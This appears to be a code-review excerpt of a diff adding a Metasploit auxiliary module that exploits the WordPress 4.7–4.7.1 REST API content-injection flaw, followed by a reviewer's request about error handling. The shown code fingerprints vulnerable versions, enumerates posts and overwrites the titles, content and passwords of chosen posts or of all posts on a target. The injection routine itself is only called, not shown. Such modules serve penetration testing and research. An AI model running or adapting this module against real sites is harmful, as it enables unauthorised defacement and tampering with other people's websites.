modules/auxiliary/scanner/http/wordpress_content_injection.rb

```diff
@@ -0,0 +1,217 @@
+    ))
+
+    register_options([
+      OptInt.new('POST_ID',          [false, 'Post ID (0 for all)', 0]),
+      OptString.new('POST_TITLE',    [false, 'Post title']),
+      OptString.new('POST_CONTENT',  [false, 'Post content']),
+      OptString.new('POST_PASSWORD', [false, 'Post password (\'\' for none)'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('PostCount',     [false, 'Number of posts to list', 100]),
+      OptString.new('SearchTerm', [false, 'Search term when listing posts'])
+    ])
+  end
+
+  def check_host(_ip)
+    if (version = wordpress_version)
+      version = Gem::Version.new(version)
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    vprint_status("WordPress #{version}: #{full_uri}")
+
+    if version.between?(Gem::Version.new('4.7'), Gem::Version.new('4.7.1'))
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Detected
+    end
+  end
+
+  def run_host(_ip)
+    if !wordpress_and_online?
+      print_error("WordPress not detected at #{full_uri}")
+      return
+    end
+
+    case action.name
+    when 'LIST'
+      do_list
+    when 'UPDATE'
+      do_update
+    end
+  end
+
+  def do_list
+    posts_to_list = list_posts
+
+    if posts_to_list.empty?
+      vprint_status("No posts found at #{full_uri}")
+      return
+    end
+
+    tbl = Rex::Text::Table.new(
+      'Header'  => "Posts at #{full_uri} (REST API: #{get_rest_api})",
+      'Columns' => %w{ID Title URL Password}
+    )
+
+    posts_to_list.each do |post|
+      tbl << [
+        post[:id],
+        Rex::Text.html_decode(post[:title]),
+        post[:url],
+        post[:password] ? 'Yes' : 'No'
+      ]
+    end
+
+    print_line(tbl.to_s)
+  end
+
+  def do_update
+    posts_to_update = []
+
+    if datastore['POST_ID'] == 0
+      posts_to_update = list_posts
+    else
+      posts_to_update << {id: datastore['POST_ID']}
+    end
+
+    if posts_to_update.empty?
+      vprint_status("No posts to update at #{full_uri}")
+      return
+    end
+
+    posts_to_update.each do |post|
+      res = update_post(post[:id],
+        title:    datastore['POST_TITLE'],
+        content:  datastore['POST_CONTENT'],
+        password: datastore['POST_PASSWORD']
+      )
+
+      post_url = full_uri(wordpress_url_post(post[:id]))
+
+      if res && res.code == 200
+        print_good("SUCCESS: #{post_url} (Post updated)")
+      elsif res && (error = res.get_json_document['message'])
+        print_error("FAILURE: #{post_url} (#{error})")
+      else
+        print_error("FAILURE: #{post_url} (Unknown error)")
+      end
+    end
+  end
+
+  def list_posts
+    posts = []
+
+    res = send_request_cgi({
+      'method'     => 'GET',
+      'uri'        => normalize_uri(get_rest_api, 'posts'),
+      'vars_get'   => {
+        'per_page' => datastore['PostCount'],
+        'search'   => datastore['SearchTerm']
+      }
+    }, 3.5)
+
+    if res && res.code == 200
+      res.get_json_document.each do |post|
```

Comment:
@wvu-r7 can we do the same error message checking as in the UPDATE action?

Example error:
```
{"code":"rest_invalid_param","message":"Invalid parameter(s): per_page","data":{"status":400,"params":{"per_page":"per_page must be between 1 (inclusive) and 100 (inclusive)"}}}
```